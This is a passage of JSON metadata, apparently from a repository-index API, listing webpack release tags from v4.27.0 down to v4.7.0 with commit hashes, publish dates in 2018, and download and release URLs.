,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpa